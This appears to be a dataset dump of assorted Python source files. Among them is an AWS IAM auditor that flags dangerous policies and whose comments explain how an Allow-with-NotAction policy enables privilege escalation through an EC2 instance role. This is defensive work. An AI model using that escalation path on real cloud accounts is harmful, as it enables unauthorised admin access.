repo_name (string, 7-94 chars) | repo_path (string, 4-237 chars) | repo_head_hexsha (string, 40 chars) | content (string, 10-680k chars) | apis (string, 2-840k chars)
---|---|---|---|---|
sauloal/cnidaria | scripts/venv/lib/python2.7/site-packages/cogent/maths/function_optimisation.py | fe6f8c8dfed86d39c80f2804a753c05bb2e485b4 | #!/usr/bin/env python
"""Algorthims for function optimisation
great_deluge() is a hillclimbing algorithm based on:
Gunter Dueck: New Optimization Heuristics, The Great Deluge Algorithm
and the Record-to-Record Travel. Journal of Computational Physics, Vol.
104, 1993, pp. 86 - 92
ga_evolve() is a basic genetic algorithm in which all internal functions can
be overridden
NOTE: both optimisation functions are generators.
"""
from numpy.random import normal
__author__ = "Daniel McDonald and Rob Knight"
__copyright__ = "Copyright 2007-2012, The Cogent Project"
__credits__ = ["Daniel McDonald", "Rob Knight"]
__license__ = "GPL"
__version__ = "1.5.3"
__maintainer__ = "Daniel McDonald"
__email__ = "[email protected]"
__status__ = "Production"
def _simple_breed(best, num, mutation_rate, random_f):
"""Returns num copies of parent with mutation_rate changes"""
result = []
score, parent = best
for child_number in range(num):
if random_f() <= mutation_rate:
child = parent.mutate()
result.append(child)
else:
result.append(parent)
return result
def _simple_score(child, target):
"""Returns the childs score as defined by the childs scoring function"""
return child.score(target)
def _simple_init(parent, num):
"""Creates a list parent copies"""
return [parent.copy() for i in range(num)]
def _simple_select(population, scores):
"""Returns a tuple: (best_score, best_child)"""
scored = zip(scores, population)
scored.sort()
return scored[0]
def great_deluge(a, step_factor=500, max_iter=100, max_total_iters=1000):
"""This generator makes random variations of the object a to minimize cost.
    A tuple containing ((iter_count, total_iters), a) is yielded at the end
    of each iteration. iter_count is used to kill the while loop when no
    object with a better cost has been found within max_iter iterations;
    it gets reset each time an object with a better cost is found.
    total_iters kills the while loop when the total number of iterations
    through the loop reaches max_total_iters.
Object a must implement methods cost() and perturb() for evaluating
the score and making mutations respectively. Usually, you'll want to
write a wrapper that passes these through to methods of an internal
data object, or functions acting on that object.
"""
water_level = curr_cost = a.cost() # can't be worse than initial guess
step_size = abs(water_level)/step_factor
iter_count = 0
total_iters = 0
while iter_count < max_iter and total_iters < max_total_iters:
new = a.perturb()
new_cost = new.cost()
if new_cost < water_level:
if new_cost < curr_cost:
water_level = max(curr_cost, water_level - step_size)
iter_count = 0 # WARNING: iter_count is reset here!
curr_cost = new_cost
a = new
else:
iter_count += 1
yield ((iter_count, total_iters), a)
total_iters += 1
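# Illustrative sketch (not part of the original module): a minimal object
# satisfying the cost()/perturb() protocol required by great_deluge(),
# minimising x**2 from a hypothetical starting point.
def _great_deluge_example():
    class Guess(object):
        def __init__(self, x):
            self.x = x
        def cost(self):
            return self.x ** 2
        def perturb(self):
            return Guess(self.x + normal(0, 0.1))
    best = None
    for (iter_count, total_iters), obj in great_deluge(Guess(5.0)):
        best = obj  # obj is replaced only when a lower cost is found
    return best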
def ga_evolve(parent, target, num, mutation_rate=0.01, score_f=_simple_score,
breed_f=_simple_breed, select_f=_simple_select,
init_f=_simple_init, random_f=normal, max_generations=1000):
"""Evolves a population based on the parent to the target
Parent must implement methods copy(), mutate(), and score(target) to be
used with the simple default functions.
Yields are performed at the end of each iteration and contain the tuple
(generation, best). The default functions return the tuple
(generation, (best_score, best_obj)).
Arguments:
parent: Object to create initial population from.
target: The goal of the evolution.
num: Population size.
mutation_rate: Rate at which objects in the population are mutated.
score_f: Function to score the object against the target.
breed_f: Function to create new population with mutations
select_f: Function to select best object(s) from the population
random_f: Function to be used in breed_f
max_generations: Kills while loop if max_generations is reached
Overload default functions:
        score_f: Must take an object and a target score. Returns the
            object's score.
        breed_f: Must take a tuple containing (score, object), the size of
            the population, a mutation rate and a random function to use.
            Returns a list containing the new population. The default
            function breeds only from the best object, which may not be
            the desired behavior.
select_f: Must take a population and scores. Returns a tuple
containing the best scores and objects in the population.
Default function returns only the best score and object.
init_f: Must take an object and the size of the population. Returns
a list containing the starting population
"""
generation = 0
population = init_f(parent, num)
while generation < max_generations:
scores = [score_f(child, target) for child in population]
best = select_f(population, scores)
population = breed_f(best, num, mutation_rate, random_f)
yield (generation, best)
generation += 1
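# Illustrative sketch (not part of the original module): a minimal parent
# type implementing copy()/mutate()/score(target) for the default helper
# functions above, evolving an integer toward a hypothetical target value.
# Note that _simple_select() sorts ascending, so lower scores are better.
def _ga_evolve_example(target=42):
    class Candidate(object):
        def __init__(self, value):
            self.value = value
        def copy(self):
            return Candidate(self.value)
        def mutate(self):
            return Candidate(self.value + int(normal(0, 3)))
        def score(self, target):
            return abs(target - self.value)  # distance to target: lower is better
    best = None
    for generation, best in ga_evolve(Candidate(0), target, num=20,
                                      mutation_rate=0.5):
        pass
    return best  # (best_score, best_candidate) from _simple_select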
| [] |
jonathanbglass/parallel_prowler | collect_policies.py | 453774a69f078c7fce11c9bb72b6deab6fc04217 | import argparse
import boto3
import json
import logging
import os
from progressbar import ProgressBar
import sys
"""
Collects IAM policies.
Evaluates policies looking for dangerous patterns: Action '*' with
Resource '*', and Effect 'Allow' combined with NotAction.
TODO: add more tests/use cases.
"""
def get_policies(profile):
session = boto3.session.Session(profile_name=profile)
myiam = session.client('iam')
marker = None
allPolicies = []
passcount = 1
while True:
pbar = ProgressBar('Collecting Policies')
print("Policy Collection, Pass Number: {}".format(passcount))
passcount += 1
if marker:
response_iterator = myiam.list_policies(OnlyAttached=True,
Marker=marker)
else:
response_iterator = myiam.list_policies(OnlyAttached=True)
for p in pbar(response_iterator['Policies']):
polVers = myiam.get_policy_version(
PolicyArn=p['Arn'], VersionId=p['DefaultVersionId'])
mypol = {'Policy': p, 'PolicyVersion': polVers['PolicyVersion']}
allPolicies.append(mypol)
pfl = open(os.path.join('policies/', p['PolicyName']+'.json'), 'w')
pfl.write(json.dumps(mypol, default=str, indent=4))
pfl.close()
ae = myiam.list_entities_for_policy(PolicyArn=p['Arn'])
pfl = open(os.path.join('attachedentities/',
p['PolicyName']+'.json'), 'w')
pfl.write(json.dumps(ae, default=str, indent=4))
pfl.close()
try:
marker = response_iterator['Marker']
except KeyError:
break
print("\nTotal Policies: {}".format(len(allPolicies)))
pbar = ProgressBar('\tChecking for Dangerous Policies')
for p in pbar(allPolicies):
# This section looks for bad/dangerous patterns
# Pattern 1: Allow *.*
# AWSLambdaRole {
# 'Version': '2012-10-17',
# 'Statement': [
# {'Effect': 'Allow',
# 'Action': '*',
# 'Resource': ['*']
# }
# ]
# }
try:
q = p['PolicyVersion']['Document']['Statement'][0]
except Exception as e:
print("Problem parsing this policy: {}".format(p))
logging.debug("Problem parsing this policy: {}".format(p))
print(e)
continue
try:
if (q['Effect'] == "Allow" and '*' in q['Resource']
and '*' in q['Action']):
print("Review Dangerous Policy: {} -> {}".format(
p['Policy']['PolicyName'],
p['PolicyVersion']['Document']))
except Exception as e:
pass
# Pattern 2: Allow: *, NotAction
# {'Version': '2012-10-17',
# 'Statement': [
# {
# 'Effect': 'Allow',
# 'NotAction': ['iam:*', 'organizations:*', 'account:*'],
# 'Resource': '*'
# },
# {
# 'Effect': 'Allow',
# 'Action': [ 'iam:CreateServiceLinkedRole',
# 'iam:DeleteServiceLinkedRole',
# 'iam:ListRoles',
# 'organizations:DescribeOrganization',
# 'account:ListRegions'
# ],
# 'Resource': '*'
# }
# ]}
        # This policy blacklists all 'iam:*', 'organizations:*', and
        # 'account:*' with the NotAction. Then it grants specific
        # access in the next stanza ('iam:ListRoles', etc.).
        # The fatal flaw is that it grants access to everything else,
        # like lambda or ec2, because of the "Allow" in the first stanza.
        # This user can create an EC2 instance, attach an admin role to
        # it, log in, and grant themselves admin access: instance
        # privilege escalation.
try:
if (q['NotAction'] and q['Effect'] == 'Allow'
and q['Resource'] == '*'):
print("Review Suspect Policy: {} -> {}".format(
p['Policy']['PolicyName'],
p['PolicyVersion']['Document']))
except Exception as e:
pass
return
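# Illustrative sketch (not part of the original script): why "Pattern 2"
# above is dangerous. Under an Allow + NotAction statement, every action
# that does not match the NotAction list is implicitly granted. This is a
# simplified, hypothetical matcher (prefix matching only).
def _not_action_allows(statement, action):
    """Return True if an Allow/NotAction/Resource:'*' statement grants action."""
    if statement.get('Effect') != 'Allow' or statement.get('Resource') != '*':
        return False
    denied = statement.get('NotAction', [])
    return not any(action.startswith(p.rstrip('*')) for p in denied)

# Example (hypothetical):
# _not_action_allows(
#     {'Effect': 'Allow',
#      'NotAction': ['iam:*', 'organizations:*', 'account:*'],
#      'Resource': '*'},
#     'ec2:RunInstances')  # -> True: ec2, lambda, etc. are fully allowed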
def check_args_creds(args):
# handle profiles / authentication / credentials
workingCreds = False
global logging
global workingProfiles
workingProfiles = []
if not args.profile:
logging.info("Using AWS Default Profile")
if (not check_profile("default")):
logging.error("Default credentials not working.")
print("Default credentials not working.")
quit()
else:
workingProfiles.append("default")
workingCreds = True
if args.profile and args.profile is not None:
logging.info("Using " + args.profile + " Profile")
if (not check_profile(args.profile)):
logging.error("Profile " + args.profile + " not working")
exit(1)
else:
logging.info("Profile " + args.profile + " working")
workingProfiles.append(args.profile)
workingCreds = True
return args.profile
def check_profile(profile):
global logging
try:
if(profile == "default"):
client = boto3.session.Session()
else:
logging.info("Testing profile: " + profile)
client = boto3.session.Session(profile_name=profile)
except Exception as e:
logging.error("Error connecting: ")
logging.error(e)
return False
try:
iam = client.client('iam')
response = iam.list_users()
except Exception as e:
logging.error("Error listing users: ")
logging.error(e)
return False
if len(response['Users']) == 0:
logging.info("No users")
    if len(response['Users']) > 0:
usercnt = len(response['Users'])
if(usercnt > 1):
userresp = " Users"
else:
userresp = " User"
logging.info(str(usercnt) + userresp)
return True
def setup_args(parser):
parser.add_argument("-p", "--profile",
help="AWS Profile")
parser.add_argument("-l", "--log",
help="Log Level")
def main():
global logging
parser = argparse.ArgumentParser()
setup_args(parser)
global args
args = parser.parse_args()
if args.log and args.log.upper() == "DEBUG":
loglevel = "DEBUG"
else:
loglevel = "INFO"
logging.basicConfig(filename='policyAssessment.log',
format='%(levelname)s:%(message)s',
level=loglevel)
profile = check_args_creds(args)
get_policies(profile)
if __name__ == "__main__":
# execute only if run as a script
main()
| [((19, 14, 19, 57), 'boto3.session.Session', 'boto3.session.Session', (), '', False, 'import boto3\n'), ((51, 11, 51, 59), 'progressbar.ProgressBar', 'ProgressBar', ({(51, 23, 51, 58): '"""\tChecking for Dangerous Policies"""'}, {}), "('\\tChecking for Dangerous Policies')", False, 'from progressbar import ProgressBar\n'), ((189, 13, 189, 38), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ({}, {}), '()', False, 'import argparse\n'), ((197, 4, 199, 39), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((25, 15, 25, 49), 'progressbar.ProgressBar', 'ProgressBar', ({(25, 27, 25, 48): '"""Collecting Policies"""'}, {}), "('Collecting Policies')", False, 'from progressbar import ProgressBar\n'), ((129, 8, 129, 49), 'logging.info', 'logging.info', ({(129, 21, 129, 48): '"""Using AWS Default Profile"""'}, {}), "('Using AWS Default Profile')", False, 'import logging\n'), ((138, 8, 138, 58), 'logging.info', 'logging.info', ({(138, 21, 138, 57): "('Using ' + args.profile + ' Profile')"}, {}), "('Using ' + args.profile + ' Profile')", False, 'import logging\n'), ((169, 8, 169, 32), 'logging.info', 'logging.info', ({(169, 21, 169, 31): '"""No users"""'}, {}), "('No users')", False, 'import logging\n'), ((131, 12, 131, 61), 'logging.error', 'logging.error', ({(131, 26, 131, 60): '"""Default credentials not working."""'}, {}), "('Default credentials not working.')", False, 'import logging\n'), ((140, 12, 140, 69), 'logging.error', 'logging.error', ({(140, 26, 140, 68): "('Profile ' + args.profile + ' not working')"}, {}), "('Profile ' + args.profile + ' not working')", False, 'import logging\n'), ((143, 12, 143, 64), 'logging.info', 'logging.info', ({(143, 25, 143, 63): "('Profile ' + args.profile + ' working')"}, {}), "('Profile ' + args.profile + ' working')", False, 'import logging\n'), ((153, 21, 153, 44), 'boto3.session.Session', 'boto3.session.Session', ({}, {}), '()', False, 'import boto3\n'), ((155, 12, 155, 55), 'logging.info', 'logging.info', ({(155, 25, 155, 54): "('Testing profile: ' + profile)"}, {}), "('Testing profile: ' + profile)", False, 'import logging\n'), ((156, 21, 156, 64), 'boto3.session.Session', 'boto3.session.Session', (), '', False, 'import boto3\n'), ((158, 8, 158, 43), 'logging.error', 'logging.error', ({(158, 22, 158, 42): '"""Error connecting: """'}, {}), "('Error connecting: ')", False, 'import logging\n'), ((159, 8, 159, 24), 'logging.error', 'logging.error', ({(159, 22, 159, 23): 'e'}, {}), '(e)', False, 'import logging\n'), ((165, 8, 165, 46), 'logging.error', 'logging.error', ({(165, 22, 165, 45): '"""Error listing users: """'}, {}), "('Error listing users: ')", False, 'import logging\n'), ((166, 8, 166, 24), 'logging.error', 'logging.error', ({(166, 22, 166, 23): 'e'}, {}), '(e)', False, 'import logging\n'), ((38, 23, 38, 73), 'os.path.join', 'os.path.join', ({(38, 36, 38, 47): '"""policies/"""', (38, 49, 38, 72): "p['PolicyName'] + '.json'"}, {}), "('policies/', p['PolicyName'] + '.json')", False, 'import os\n'), ((39, 22, 39, 62), 'json.dumps', 'json.dumps', (), '', False, 'import json\n'), ((42, 23, 43, 60), 'os.path.join', 'os.path.join', ({(42, 36, 42, 55): '"""attachedentities/"""', (43, 36, 43, 59): "p['PolicyName'] + '.json'"}, {}), "('attachedentities/', p['PolicyName'] + '.json')", False, 'import os\n'), ((44, 22, 44, 59), 'json.dumps', 'json.dumps', (), '', False, 'import json\n')] |
StackVista/stackstate-agent | test/molecule-role/molecule/integrations/tests/test_nagios.py | 843f66189fae107646c57f71fed962bdaab3b3be | import json
import os
import re
from testinfra.utils.ansible_runner import AnsibleRunner
import util
testinfra_hosts = AnsibleRunner(os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('agent-integrations')
def _get_key_value(tag_list):
for key, value in (pair.split(':', 1) for pair in tag_list):
yield key, value
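# Illustration (hypothetical tags): each tag is a "key:value" string split on
# the first colon only, so values may themselves contain colons, e.g.
#   dict(_get_key_value(["container_name:ubuntu_nagios_1", "image:nagios:latest"]))
#   == {"container_name": "ubuntu_nagios_1", "image": "nagios:latest"}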
def _component_data(json_data, type_name, external_id_assert_fn, tags_assert_fn):
for message in json_data["messages"]:
p = message["message"]["TopologyElement"]["payload"]
if "TopologyComponent" in p and \
p["TopologyComponent"]["typeName"] == type_name and \
external_id_assert_fn(p["TopologyComponent"]["externalId"]):
data = json.loads(p["TopologyComponent"]["data"])
if tags_assert_fn(dict(_get_key_value(data["tags"]))):
return data
return None
def test_nagios_mysql(host):
def assert_topology():
topo_url = "http://localhost:7070/api/topic/sts_topo_process_agents?limit=1500"
data = host.check_output('curl "{}"'.format(topo_url))
json_data = json.loads(data)
with open("./topic-nagios-topo-process-agents.json", 'w') as f:
json.dump(json_data, f, indent=4)
external_id_pattern = re.compile(r"urn:container:/agent-integrations:.*")
components = [
{
"assertion": "Should find the nagios container",
"type": "container",
"external_id": lambda e_id: external_id_pattern.findall(e_id),
"tags": lambda t: t["container_name"] == "ubuntu_nagios_1"
},
{
"assertion": "Should find the mysql container",
"type": "container",
"external_id": lambda e_id: external_id_pattern.findall(e_id),
"tags": lambda t: t["container_name"] == "ubuntu_mysql_1"
}
]
for c in components:
print("Running assertion for: " + c["assertion"])
assert _component_data(
json_data=json_data,
type_name=c["type"],
external_id_assert_fn=c["external_id"],
tags_assert_fn=c["tags"],
) is not None
util.wait_until(assert_topology, 30, 3)
def test_container_metrics(host):
url = "http://localhost:7070/api/topic/sts_multi_metrics?limit=1000"
def wait_for_metrics():
data = host.check_output("curl \"%s\"" % url)
json_data = json.loads(data)
with open("./topic-nagios-sts-multi-metrics.json", 'w') as f:
json.dump(json_data, f, indent=4)
def get_keys(m_host):
return set(
''.join(message["message"]["MultiMetric"]["values"].keys())
for message in json_data["messages"]
if message["message"]["MultiMetric"]["name"] == "convertedMetric" and
message["message"]["MultiMetric"]["host"] == m_host
)
expected = {'nagios.http.size', 'nagios.ping.pl', 'nagios.http.time', 'nagios.current_load.load15',
'nagios.swap_usage.swap', 'nagios.host.pl', 'nagios.root_partition', 'nagios.current_users.users',
'nagios.current_load.load1', 'nagios.host.rta', 'nagios.ping.rta', 'nagios.current_load.load5',
'nagios.total_processes.procs'}
        assert all(expectedMetric in get_keys("agent-integrations") for expectedMetric in expected)
util.wait_until(wait_for_metrics, 180, 3)
| [((62, 4, 62, 43), 'util.wait_until', 'util.wait_until', ({(62, 20, 62, 35): 'assert_topology', (62, 37, 62, 39): '(30)', (62, 41, 62, 42): '(3)'}, {}), '(assert_topology, 30, 3)', False, 'import util\n'), ((88, 4, 88, 45), 'util.wait_until', 'util.wait_until', ({(88, 20, 88, 36): 'wait_for_metrics', (88, 38, 88, 41): '(180)', (88, 43, 88, 44): '(3)'}, {}), '(wait_for_metrics, 180, 3)', False, 'import util\n'), ((9, 18, 9, 70), 'testinfra.utils.ansible_runner.AnsibleRunner', 'AnsibleRunner', ({(9, 32, 9, 69): "os.environ['MOLECULE_INVENTORY_FILE']"}, {}), "(os.environ['MOLECULE_INVENTORY_FILE'])", False, 'from testinfra.utils.ansible_runner import AnsibleRunner\n'), ((33, 20, 33, 36), 'json.loads', 'json.loads', ({(33, 31, 33, 35): 'data'}, {}), '(data)', False, 'import json\n'), ((37, 30, 37, 81), 're.compile', 're.compile', ({(37, 41, 37, 80): '"""urn:container:/agent-integrations:.*"""'}, {}), "('urn:container:/agent-integrations:.*')", False, 'import re\n'), ((70, 20, 70, 36), 'json.loads', 'json.loads', ({(70, 31, 70, 35): 'data'}, {}), '(data)', False, 'import json\n'), ((23, 19, 23, 61), 'json.loads', 'json.loads', ({(23, 30, 23, 60): "p['TopologyComponent']['data']"}, {}), "(p['TopologyComponent']['data'])", False, 'import json\n'), ((35, 12, 35, 45), 'json.dump', 'json.dump', (), '', False, 'import json\n'), ((72, 12, 72, 45), 'json.dump', 'json.dump', (), '', False, 'import json\n')] |
papsebestyen/erudition | erudition/util.py | 35aa502a96189131baff714a6212eb56de2b1272 | import os
import sys
from contextlib import contextmanager
from invoke import UnexpectedExit
def git_commit(c, addstr, msg):
try:
c.run("git config --get user.email")
c.run("git config --get user.name")
except UnexpectedExit:
c.run('git config --local user.email "[email protected]"')
c.run('git config --local user.name "CI/CD"')
c.run(f'git add {addstr} && git commit -m "{msg}"')
@contextmanager
def cd_into(dirpath):
wd = os.getcwd()
os.chdir(dirpath)
sys.path.insert(0, str(dirpath))
yield
os.chdir(wd)
sys.path.pop(0)
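# Usage sketch (hypothetical path): run a block of code from another working
# directory, with that directory importable, restoring both afterwards.
#
# with cd_into("/tmp/some-package"):
#     import some_module  # resolved relative to /tmp/some-package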
| [((20, 9, 20, 20), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((21, 4, 21, 21), 'os.chdir', 'os.chdir', ({(21, 13, 21, 20): 'dirpath'}, {}), '(dirpath)', False, 'import os\n'), ((24, 4, 24, 16), 'os.chdir', 'os.chdir', ({(24, 13, 24, 15): 'wd'}, {}), '(wd)', False, 'import os\n'), ((25, 4, 25, 19), 'sys.path.pop', 'sys.path.pop', ({(25, 17, 25, 18): '(0)'}, {}), '(0)', False, 'import sys\n')] |
MeekoI/ais-sdk | python3/distortion_correct_aksk_demo.py | 76240abc49795e914988f3cafb6d08f60dbdcb4c | # -*- coding:utf-8 -*-
from ais_sdk.utils import encode_to_base64
from ais_sdk.utils import decode_to_wave_file
from ais_sdk.distortion_correct import distortion_correct_aksk
from ais_sdk.utils import init_global_env
import json
if __name__ == '__main__':
#
    # Access the moderation distortion-correction service; POST data using AK/SK.
#
app_key = '*************'
app_secret = '************'
init_global_env(region='cn-north-1')
demo_data_url = 'https://ais-sample-data.obs.cn-north-1.myhuaweicloud.com/vat-invoice.jpg'
    # Call the interface with the URL; correction=True means do not apply correction
result = distortion_correct_aksk(app_key, app_secret, "", demo_data_url, True)
result_obj = json.loads(result)
if result_obj['result']['data'] != '':
decode_to_wave_file(result_obj['result']['data'], 'data/moderation-distortion-aksk-1.png')
else:
print(result)
    # Call the interface with a local file, base64-encoded
result = distortion_correct_aksk(app_key, app_secret, encode_to_base64('data/moderation-distortion.jpg'), '', True)
result_obj = json.loads(result)
if result_obj['result']['data'] != '':
decode_to_wave_file(result_obj['result']['data'], 'data/moderation-distortion-aksk-2.png')
else:
print(result) | [((14, 4, 14, 40), 'ais_sdk.utils.init_global_env', 'init_global_env', (), '', False, 'from ais_sdk.utils import init_global_env\n'), ((19, 13, 19, 82), 'ais_sdk.distortion_correct.distortion_correct_aksk', 'distortion_correct_aksk', ({(19, 37, 19, 44): 'app_key', (19, 46, 19, 56): 'app_secret', (19, 58, 19, 60): '""""""', (19, 62, 19, 75): 'demo_data_url', (19, 77, 19, 81): 'True'}, {}), "(app_key, app_secret, '', demo_data_url, True)", False, 'from ais_sdk.distortion_correct import distortion_correct_aksk\n'), ((20, 17, 20, 35), 'json.loads', 'json.loads', ({(20, 28, 20, 34): 'result'}, {}), '(result)', False, 'import json\n'), ((28, 17, 28, 35), 'json.loads', 'json.loads', ({(28, 28, 28, 34): 'result'}, {}), '(result)', False, 'import json\n'), ((22, 8, 22, 98), 'ais_sdk.utils.decode_to_wave_file', 'decode_to_wave_file', ({(22, 28, 22, 56): "result_obj['result']['data']", (22, 58, 22, 97): '"""data/moderation-distortion-aksk-1.png"""'}, {}), "(result_obj['result']['data'],\n 'data/moderation-distortion-aksk-1.png')", False, 'from ais_sdk.utils import decode_to_wave_file\n'), ((27, 58, 27, 108), 'ais_sdk.utils.encode_to_base64', 'encode_to_base64', ({(27, 75, 27, 107): '"""data/moderation-distortion.jpg"""'}, {}), "('data/moderation-distortion.jpg')", False, 'from ais_sdk.utils import encode_to_base64\n'), ((30, 8, 30, 98), 'ais_sdk.utils.decode_to_wave_file', 'decode_to_wave_file', ({(30, 28, 30, 56): "result_obj['result']['data']", (30, 58, 30, 97): '"""data/moderation-distortion-aksk-2.png"""'}, {}), "(result_obj['result']['data'],\n 'data/moderation-distortion-aksk-2.png')", False, 'from ais_sdk.utils import decode_to_wave_file\n')] |
Arpit8081/Phishtray_Edited_Version | exercise/migrations/0016_auto_20191025_1624.py | 9f3342e6fd2620b7f01ad91ce5b36fa8ea111bc8 | # Generated by Django 2.2.6 on 2019-10-25 16:24
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('exercise', '0015_exerciseemailproperties_date_received'),
]
operations = [
migrations.AlterField(
model_name='exercise',
name='copied_from',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='exercise.Exercise'),
),
]
| [((17, 18, 17, 130), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n')] |
YKato521/ironpython-stubs | release/stubs.min/Autodesk/Revit/DB/__init___parts/GeomCombinationSet.py | b1f7c580de48528490b3ee5791b04898be95a9ae | class GeomCombinationSet(APIObject, IDisposable, IEnumerable):
"""
A set that contains GeomCombination objects.
GeomCombinationSet()
"""
def Clear(self):
"""
Clear(self: GeomCombinationSet)
    Removes every GeomCombination item from the set, rendering it empty.
"""
pass
def Contains(self, item):
"""
Contains(self: GeomCombinationSet,item: GeomCombination) -> bool
    Tests for the existence of a GeomCombination within the set.
item: The element to be searched for.
Returns: The Contains method returns True if the GeomCombination is within the set,
otherwise False.
"""
pass
def Dispose(self):
""" Dispose(self: GeomCombinationSet,A_0: bool) """
pass
def Erase(self, item):
"""
Erase(self: GeomCombinationSet,item: GeomCombination) -> int
Removes a specified GeomCombination from the set.
item: The GeomCombination to be erased.
Returns: The number of GeomCombinations that were erased from the set.
"""
pass
def ForwardIterator(self):
"""
ForwardIterator(self: GeomCombinationSet) -> GeomCombinationSetIterator
Retrieve a forward moving iterator to the set.
Returns: Returns a forward moving iterator to the set.
"""
pass
def GetEnumerator(self):
"""
GetEnumerator(self: GeomCombinationSet) -> IEnumerator
Retrieve a forward moving iterator to the set.
Returns: Returns a forward moving iterator to the set.
"""
pass
def Insert(self, item):
"""
Insert(self: GeomCombinationSet,item: GeomCombination) -> bool
Insert the specified element into the set.
item: The GeomCombination to be inserted into the set.
Returns: Returns whether the GeomCombination was inserted into the set.
"""
pass
def ReleaseManagedResources(self, *args):
""" ReleaseManagedResources(self: APIObject) """
pass
def ReleaseUnmanagedResources(self, *args):
""" ReleaseUnmanagedResources(self: GeomCombinationSet) """
pass
def ReverseIterator(self):
"""
ReverseIterator(self: GeomCombinationSet) -> GeomCombinationSetIterator
Retrieve a backward moving iterator to the set.
Returns: Returns a backward moving iterator to the set.
"""
pass
def __enter__(self, *args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self, *args):
""" __iter__(self: IEnumerable) -> object """
pass
IsEmpty = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Test to see if the set is empty.
Get: IsEmpty(self: GeomCombinationSet) -> bool
"""
Size = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Returns the number of GeomCombinations that are in the set.
Get: Size(self: GeomCombinationSet) -> int
"""
| [] |
omribahumi/rainbow | rainbow/datasources/cfn_datasource.py | 17aad61231b1f1b9d0dca43979e2fa4c8a1603f3 | from rainbow.cloudformation import Cloudformation
from base import DataSourceBase
__all__ = ['CfnOutputsDataSource', 'CfnResourcesDataSource', 'CfnParametersDataSource']
class CfnDataSourceBase(DataSourceBase):
def __init__(self, data_source):
super(CfnDataSourceBase, self).__init__(data_source)
stack_name = data_source
region = Cloudformation.default_region
if ':' in data_source:
region, stack_name = data_source.split(':', 1)
cfn_connection = Cloudformation(region)
if not cfn_connection:
raise Exception('Invalid region %r' % (region,))
self.stack = cfn_connection.describe_stack(stack_name)
class CfnOutputsDataSource(CfnDataSourceBase):
datasource_name = 'cfn_outputs'
def __init__(self, data_source):
super(CfnOutputsDataSource, self).__init__(data_source)
self.data = {i.key: i.value for i in self.stack.outputs}
class CfnResourcesDataSource(CfnDataSourceBase):
datasource_name = 'cfn_resources'
def __init__(self, data_source):
super(CfnResourcesDataSource, self).__init__(data_source)
self.data = {r.logical_resource_id: r.physical_resource_id for r in self.stack.describe_resources()}
class CfnParametersDataSource(CfnDataSourceBase):
datasource_name = 'cfn_parameters'
def __init__(self, data_source):
super(CfnParametersDataSource, self).__init__(data_source)
self.data = {p.key: p.value for p in self.stack.parameters}
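# Usage sketch (hypothetical stack name/region; the data source string follows
# the "[region:]stack_name" convention parsed in CfnDataSourceBase):
#
# outputs = CfnOutputsDataSource('us-east-1:my-stack').data
# resources = CfnResourcesDataSource('my-stack').data  # default region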
| [((17, 25, 17, 47), 'rainbow.cloudformation.Cloudformation', 'Cloudformation', ({(17, 40, 17, 46): 'region'}, {}), '(region)', False, 'from rainbow.cloudformation import Cloudformation\n')] |
idan/pypostbin | epio_commands/management/commands/epio_flush_redis.py | 61dd1c0960e8fb6e4460a5623971cbbc78a55ee7 | import redis
from bundle_config import config
from django.core.management.base import NoArgsCommand
class Command(NoArgsCommand):
help = 'Flushes all keys in redis.'
def handle_noargs(self, **options):
r = redis.Redis(host=config['redis']['host'], port=int(config['redis']['port']), password=config['redis']['password'])
r.flushall()
print "All redis keys flushed."
| [] |
zmxdream/FlexFlow | python/flexflow_cffi_build.py | 7ea50d71a02e853af7ae573d88c911511b3e82e0 | #!/usr/bin/env python
# Copyright 2020 Stanford University, Los Alamos National Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import os
import subprocess
def find_flexflow_header(ffhome_dir):
def try_prefix(prefix_dir):
flexflow_ch_path = os.path.join(prefix_dir, 'python', 'flexflow_c.h')
flexflow_cxxh_path = os.path.join(prefix_dir, 'include', 'model.h')
if os.path.exists(flexflow_ch_path) and os.path.exists(flexflow_cxxh_path):
flexflow_cxxh_dir = os.path.join(prefix_dir, 'include')
return flexflow_cxxh_dir, flexflow_ch_path
result = try_prefix(ffhome_dir)
if result:
return result
raise Exception('Unable to locate flexflow_c.h and flexflow.h header file')
def build(output_dir, libname, ffhome_dir):
flexflow_cxxh_dir, flexflow_ch_path = find_flexflow_header(ffhome_dir)
header = subprocess.check_output(['gcc', '-I', flexflow_cxxh_dir, '-E', '-P', flexflow_ch_path]).decode('utf-8')
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'flexflow_cffi_header.py.in')) as f:
content = f.read()
content = content.format(header=repr(header), libname=repr(libname))
if output_dir is None:
output_dir = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(output_dir, 'flexflow_cffi_header.py'), 'wb') as f:
f.write(content.encode('utf-8'))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--ffhome-dir', required=True)
parser.add_argument('--libname', required=True)
parser.add_argument('--output-dir', required=False)
args = parser.parse_args()
build(args.output_dir, args.libname, args.ffhome_dir)
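# Usage sketch (hypothetical paths; flags match the argparse setup above):
#   python flexflow_cffi_build.py --ffhome-dir /path/to/FlexFlow \
#       --libname libflexflow.so --output-dir python/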
